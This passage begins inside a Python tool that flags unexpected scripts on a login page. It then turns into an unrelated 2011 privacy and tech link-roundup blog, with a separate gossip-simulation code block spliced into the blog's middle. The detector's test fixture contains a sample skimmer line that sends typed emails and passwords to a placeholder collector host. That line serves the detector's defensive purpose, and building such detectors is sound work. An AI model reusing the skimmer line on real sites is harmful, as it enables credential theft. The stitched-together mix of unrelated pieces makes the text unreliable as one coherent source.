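    "new Image().src = 'http://collector.example.invalid/?d=' "
    "+ encodeURIComponent(f.email.value + ':' + f.pass.value);"
)

PAGE_TEMPLATE = """<html><body>
<form method="post" action="/login">
  <input id="email" name="email"><input name="pass" type="password">
</form>
<script src="/static/app.js"></script>
<script>{legit}</script>
{extra}
</body></html>"""

BASELINE_PAGE = PAGE_TEMPLATE.format(legit=LEGIT_SCRIPT, extra="")
TAMPERED_PAGE = PAGE_TEMPLATE.format(
    legit=LEGIT_SCRIPT, extra="<script>" + INJECTED_SCRIPT + "</script>")

# Allowlist taken from a known-good copy of the page (here, the baseline itself).
ALLOWLIST = {script_hash(s) for s in find_unexpected_scripts(BASELINE_PAGE, set())}


if __name__ == "__main__":
    print("baseline unexpected:", find_unexpected_scripts(BASELINE_PAGE, ALLOWLIST))
    print("tampered unexpected:", find_unexpected_scripts(TAMPERED_PAGE, ALLOWLIST))
```

The allowlist has to come from a copy of the page fetched over a path the adversary does not control; if the baseline is captured through the same tampered network, the injected script is allowlisted along with everything else. External scripts (those with a src attribute) are skipped here; they need a separate check of the fetched file against its expected hash.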

My concern: Are we removing the possibility of true anonymity?

New Urban Myth: The Internet ID Scare

January 11, 2011 by Dissent

Jim Dempsey of CDT writes:

Let’s get this over right away: The Obama Administration is not planning to create a government ID for the Internet. In fact, the Administration is proposing just the opposite: to rely on the private sector to develop identities (note the plural) for online commerce, in system that allows individuals to have multiple identities and to engage in online activity anonymously and pseudonymously. [As long as someone knows exactly who you are... Bob]

And let’s get this straight too: I have not been criticizing the government’s plan. Just the opposite: I have been praising the Administration for promoting improvements in online identity that would address concerns about identity theft, online fraud and cybersecurity without creating a centralized or government-managed system.

Read more on CDT.


Obama Administration fleshes out online trusted IDs

January 12, 2011 by Dissent

Jaikumar Vijayan reports:

The National Institute of Standards and Technology (NIST) has established a new Web site fleshing out the Obama Administration’s plans for a National Strategy for Trusted Identities in Cyberspace (NSTIC).

The Web site appears designed to provide additional information on the government’s unfolding strategy, as well as to downplay any concerns some might harbor about NSTIC resulting in the creation of a national ID card.

The site’s launch comes just days after Obama Administration officials announced the creation of a new national program office within the U.S. Department of Commerce for handling the NSTIC.

Read more on Computerworld.

Government has to step in when parents don't do their job.

N.J. Town To Vote On Middle School Drug Tests

January 11, 2011 by Dissent kindly pointed me to a situation in New Jersey that will be of concern to all those who care about student privacy and civil liberties:

A proposal to conduct random drug tests of young students in one New Jersey town is raising some eyebrows.

Students at Belvidere Elementary School could be adding drug testing to their list of lessons when they move into middle school.

The Board of Education will vote Wednesday on a plan to randomly test sixth, seventh and eighth graders to see if they are under the influence of drugs. School administrators said they were confident the proposal would pass.

Elementary School Principal Sandra Szabocsik said school officials want to use the testing “as a deterrent.” [If we don't get pay raises, we might move on to “cavity searches!” Bob]

Read more on CBS News. Before you throw something at the wall, do note that the administrators say that this program will be voluntary and will require both student and parental consent for participation. [“Nah nah na nah na! Your parents think you're a druggie!” Bob] They also say that no one will be turned in to the police or suspended if they test positive.

But what happens to children who refuse to participate? Will they be viewed as having ‘something to hide’ or be treated differently in subtle or unconscious – if not conscious – ways by school personnel?

John Wesley Hall of sees this as a blatant Fourth Amendment violation. He’s the expert, but I’m not sure I understand how a “voluntary” program is a blatant Fourth Amendment violation. I hope he’ll clarify/educate me on that.

(Related) Who are we supposed to be protecting?

Parental Monitoring Carries Risks

January 12, 2011 by Dissent

A press release from was so strongly worded that I held off posting it until I could check into some of its assertions, but after checking, I think it’s worth posting this to alert parents to check more before signing up for any service:, an anti-sexting and anti-bullying business promoted by stockholder and former U.S. Secretary of Education William Bennett, offers its online monitoring services to parents who may be unaware they are giving up family privacy, according to a new report by School Safety Partners.

Parents who register with MouseMail may not realize they are granting MouseMail the right to publish all private messages and photos their families transmit through the system.

Although parents may cancel the texting and email-sniffing service at any time, MouseMail still keeps the right to publish in any way the family content stored on company servers. also reserves the right to turn over any personal information or messages to law enforcement agencies without first notifying parents or children. [Since they own everything, they could also sell it to the National Enquirer, right? Bob]

The MouseMail team includes Bennett, Fox News regulars Frank Luntz and Angela McGlowan, and McGlowan’s husband, John Venners, as president. The company uses social media and viral marketing, along with non-profit endorsements in the hopes of attracting millions of subscribers nationwide.

School Safety Partners explains that parents surrender privacy the moment they request a free MouseMail trial. The MouseMail trial registration form includes a small text box that contains a 5500-word contract. By scrolling down to line 775 of the text box contract, parents are advised of their irrevocable loss of privacy. Clause 17 states:

“With respect to any Content or User Content that You upload to the Service or transmit through the Service, You hereby grant Safe Communications, Inc. a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publically perform, publicly display, and distribute that Content and User Content, the subject of the Content and other data.”

School Safety Partners finds that privacy and liability risks crop up in the terms of service and privacy policies of most MouseMail competitors as well. Over 20 companies now offer online monitoring services to parents alarmed by the way children connect today.

Before using online services to monitor their children, parents are urged by School Safety Partners to ask themselves these questions about privacy and liability issues:

1. Does the service company acquire all rights to publish my family’s private messages?

2. Does the service company have the right to turn over my family’s messages to authorities without my authorization or without first notifying me?

3. What are my obligations to the service company if a matter is to be resolved privately?

4. Will I be adequately notified about any changes to the company’s privacy policy?

5. Does my child’s school have a policy about confiscating and searching cell phones? If so, how does it conflict with my parental monitoring and controls?

6. What are the legal consequences of preserving or deleting incriminating messages? How should offensive content be preserved or deleted?

7. Am I obligated to report criminal activity or serious risk behavior that the service brings to my attention?

8. In my state, what are the legal consequences of sexting, cyber-bullying, forwarding third-party offensive messages, issuing threats of violence, and other online criminal activities?

9. How long does the service company store my family’s messages and online activity logs?

10. Will my family’s private information be accessible for investigations centered around other families, or for out-of-state or national investigations?

For in-depth coverage of anti-bullying policies and other school safety issues, visit School Safety Partners at

Clever strategy. Let everyone fight over US Health Records while IBM captures the rest of the world...

IBM to digitize records for Russian hospitals

For my Disaster Recovery students. Think of it as a massively redundant network... Sort of what the Internet was intended to be.

Breaking bottlenecks

A new algorithm enables much faster dissemination of information through self-organizing networks with a few scattered choke points.

As sensors that do things like detect touch and motion in cell phones get smaller, cheaper and more reliable, computer manufacturers are beginning to take seriously the decade-old idea of “smart dust” — networks of tiny wireless devices that permeate the environment, monitoring everything from the structural integrity of buildings and bridges to the activity of live volcanoes. In order for such networks to make collective decisions, however — to, say, recognize that a volcano is getting restless — they need to integrate information gathered by hundreds or thousands of devices.

… It turns out that if you’re a sensor in a network with high connectivity — one in which any device can communicate directly with many of the others — simply selecting a neighboring device at random each round and sending it all the information you have makes it likely that every device’s information will permeate the whole network. But take two such highly connected networks and connect them to each other with only one link — a bottleneck — and the random-neighbor algorithm no longer works well.
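The failure mode in that last paragraph is easy to see in a simulation. Below is an added example, not code from the MIT article: random-neighbour push gossip run on one well-connected cluster and on two such clusters joined by a single link. The cluster sizes, the push-only model (an informed node sends to one random neighbour per round) and the trial count are assumptions chosen for the demonstration; the article's improved algorithm is not reproduced here.

```python
import random


def two_cliques_with_bridge(n):
    """Two fully connected clusters of n nodes each, joined by one edge (0 -- n)."""
    adj = {}
    for offset in (0, n):
        for a in range(n):
            adj[a + offset] = [b + offset for b in range(n) if b != a]
    adj[0].append(n)      # the single bottleneck link
    adj[n].append(0)
    return adj


def single_clique(n):
    """One fully connected cluster of n nodes (the high-connectivity case)."""
    return {v: [u for u in range(n) if u != v] for v in range(n)}


def push_gossip_rounds(adj, source, rng, max_rounds=100000):
    """Random-neighbour push gossip: each round, every informed node sends
    everything it knows to one uniformly chosen neighbour.
    Returns the number of rounds until every node is informed."""
    informed = {source}
    rounds = 0
    while len(informed) < len(adj):
        rounds += 1
        if rounds > max_rounds:
            raise RuntimeError("gossip did not converge")
        informed |= {rng.choice(adj[v]) for v in informed}
    return rounds


def mean_rounds(adj, trials=50, seed=1):
    """Average rounds to full dissemination from node 0, with a fixed seed."""
    rng = random.Random(seed)
    return sum(push_gossip_rounds(adj, 0, rng) for _ in range(trials)) / trials


if __name__ == "__main__":
    n = 30
    print("one cluster of %d nodes:        %.1f rounds" % (2 * n, mean_rounds(single_clique(2 * n))))
    print("two clusters of %d, one link:   %.1f rounds" % (n, mean_rounds(two_cliques_with_bridge(n))))
```

In the bridged graph only node 0 can carry the information across, and it picks the bridge with probability 1/30 per round, so the second cluster waits about 30 rounds on average before it hears anything, several times longer than the single cluster takes to be fully informed. Adding even a handful of extra cross-links collapses that delay, which is the redundancy argument the note above is making.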

It's on the Internet, so it must be true...

F. Lee Bailey: Paper proves OJ Simpson's innocence

In the 20,000-word document, F. Lee Bailey tells of four people who could have bolstered Simpson's case but never testified. He also gives an overview of the sensational trial from his own perspective.

Simpson was found not guilty. Most Americans are convinced that he is guilty, Bailey said, but the document might persuade some doubters that he is innocent.

Bailey wrote the document, "The Simpson Verdict," in 2007 as a proposal for a book that never materialized. He published it on his website Sunday.


“Gee, we never thought they would cheat...”

Florida cancels online learner's permit test after finding over 50% can't pass test in real life [w/video]

For the past decade, potential new drivers had the option of taking their permit test online. This practice just came to a screeching halt when they found that a large percentage of drivers passing the online test failed the in-person version. How large? Over 50 percent.

If you have time...

Tuesday, January 11, 2011

Free Webinar - Google's Advanced Search Options

This Thursday, January 13, Google is hosting a free webinar titled Beyond the First Five Links. The webinar will introduce participants to using the advanced search tools located in the left hand panel of the search results page. Participants will learn how to discover new content without having to form complex search terms. The webinar is free, but you do have to register to participate. The webinar will be live at 3:30pm EST.

Tuesday, January 11, 2011

Flash! Not all teachers are created equal! Union stunned!

NY: Judge rules Dept. of Education can release names, job rankings of public school teachers

January 10, 2011 by Dissent

Jose Martinez reports:

A Manhattan judge ruled Monday that the Department of Education can release the names and job rankings of more than 12,000 public school teachers.

The decision by Justice Cynthia Kern is a blow to the United Federation of Teachers, which tried to block the DOE from making the internal ratings system public.

The union has argued the data is flawed – and releasing wrong information to the public could destroy careers.

In a 10-page decision, Kern noted that the union’s concerns over privacy are outweighed by public interest in how teachers perform – and pointed out that the courts have repeatedly held that the release of job-related information is not an invasion of privacy.

Read more in the New York Daily News

California, thy name is Boondoggle.

New California driver's licenses so complex, manufacturer has struggled to get them right

When the California Department of Motor Vehicles unveiled a newly designed driver's license last fall -- the first major revision in a decade -- officials touted sophisticated security features that promised to make the cards easier to use and harder to fake.

The cardholder's signature and birth date would be raised, so they could be felt. Hidden images would be revealed only by ultraviolet light, and a perforated outline of the California brown bear would be visible when a flashlight was pressed against the back of the card.

DMV Director George Valverde said the vendor, L-1 Identity Solutions, has struggled with color accuracy, the raised lettering and the positioning of images of California icons, including El Capitan in Yosemite and the Golden Gate Bridge. L-1 was the only bidder on the five-year, $63-million job, Valverde said.

It sounds techie, but it's really more complicated than that. It's a legal thing...

Hospital Wireless Networks May Be Regulated Medical Devices

"As hospitals continue to connect patient monitoring equipment, physician PDAs and laptops to wireless networks, and then collapse those data paths onto traditional IT networks, the closer the US Food and Drug Administration comes to regulating them, according to Computerworld. The focus of the FDA's regulation comes in its recently finalized 80001-1 standard that established risk management practices for those networks, the adherence to which may be voluntary, but would determine Medicaid and Medicare reimbursements. 'If you don't comply, then you have two choices. You can have the federal government come in and inspect your hospital, or you can decide not to accept money from Medicare or Medicaid. Voluntary sometimes isn't exactly voluntary,' said Rick Hampton, wireless communications manager for Partners HealthCare System in Boston."

Another reason I'm not a lawyer. How can it be permissible to rely on something you didn't know about?

Fifth Circuit Permits Warrantless Government Searches Based on Previous Private Search Not Known To Police

January 10, 2011 by Dissent

Orin Kerr writes:

Last week the Fifth Circuit handed down a significant decision on the “private search” doctrine in Fourth Amendment law, United States v. Oliver. Oliver permits warrantless searches under the private search doctrine even when the police who conducted the search didn’t know about the private search. I don’t think the private search doctrine can extend so far, and in this post I hope to explain why I think the decision is wrong. I also want to explain why a different Fourth Amendment rule, the “apparent authority” doctrine, very possibly applies to the facts of this case. The apparent authority doctrine was not litigated in the Oliver case, but it should have been. If I’m right about that, the Oliver decision may have reached a plausible result but did so using a rationale that is quite troubling and likely to cause more problems in the future.

Read more on The Volokh Conspiracy.

Exemplars of “Truth, Justice and the Copyright Way?”

Record Labels To Pay For Copyright Infringement

"Sony Music Entertainment Canada Inc., EMI Music Canada Inc., Universal Music Canada Inc. and Warner Music Canada Co. have agreed to pay songwriters and music publishers $47.5 million in damages for copyright infringement and overdue royalties to settle a class action lawsuit. 'The 2008 class action alleges that the record companies "exploited" music owners by reproducing and selling in excess of 300,000 song titles without securing licenses from the copyright owners and/or without paying the associated royalty payments. The record companies knowingly did so and kept a so-called "pending list" of unlicensed reproductions, setting aside $50 million for the issue, if it ever arose, court filings suggest.'"

“Yeah, we're changing the contract. So what?”

T-Mobile Slashes Fair Use Policy, Says Download At Home

"T-Mobile in the UK has revealed a new fair use policy, cutting caps from 1GB and 3GB to 500MB, saying mobile browsing doesn't include videos or large downloads. 'If you want to download, stream and watch video clips, save that stuff for your home broadband,' the company said. All those people who have bought smartphones with the aim of doing such things on the go may not agree with the mobile operator, however. Any user that goes over the new limit won't be charged, but will be blocked from downloading or streaming for the rest of the month."

(Related) ...and if they charge for “excess” data, here's a phone to avoid.

Microsoft Looking Into Windows Phone 7's 'Excessive' Data Use

"A few users are complaining that Windows Phone 7 is eating data plans alive. One user estimates idle data usage at 3-5 Mb per hour. Not good for a phone which seems to be struggling against Android and iPhone."

(Related) How to take advantage of your competitors weakness...

Verizon To Offer iPhone Users Unlimited Data

"The WSJ reports that Verizon Wireless, the country's largest wireless carrier, is confident enough in its network that it will offer unlimited data-use plans when it starts selling the iPhone around the end of this month, a person familiar with the matter says. Such plans would provide a key means of distinguishing its service from rival AT&T Inc., which limits how much Internet data its customers may use each month. Verizon has a lot at stake as it starts to carry the iPhone, which it is expected to announce Tuesday at an event in New York City. Verizon, more than any other US carrier, has built its reputation on its network quality, and any stumble in handling iPhone traffic will call into question Verizon's major selling point. On the other hand, if it does handle the iPhone well, then AT&T will have a harder time arguing it didn't mismanage its own network. Anthony J. Melone, Verizon's chief technology officer, says the company has invested heavily in its 3G network to handle surging smartphone traffic, including nine million Android subscribers, up from none a year earlier."

I'll go a bit farther with Baen. They often include a CD in their books, with the entire catalog of books by that author! I copy the CD (they encourage it) and send it to my fellow Sci Fi nuts, many of whom have started reading Baen authors (and buying the books because, like me, they have trouble focusing their bifocals on a computer screen.)

Book Piracy — Less DRM, More Data

"Ambiguity surrounds the real impact of digital book piracy, notes Brian O'Leary in an interview with O'Reilly Radar, but all would be better served if more data was shared and less effort was exerted on futile DRM. 'The publishing industry should be working as hard as we can to develop new and innovative business models that meet the needs of readers. And what those look like could be community-driven. I think of Baen Books, for example, which doesn't put any DRM restrictions on its content but is one of the least pirated book publishers. As to sales, Paulo Coelho is a good example. He mines the piracy data to see if there's a burgeoning interest for his books in a particular country or market. If so, he either works to get his book out in print or translate it in that market.'"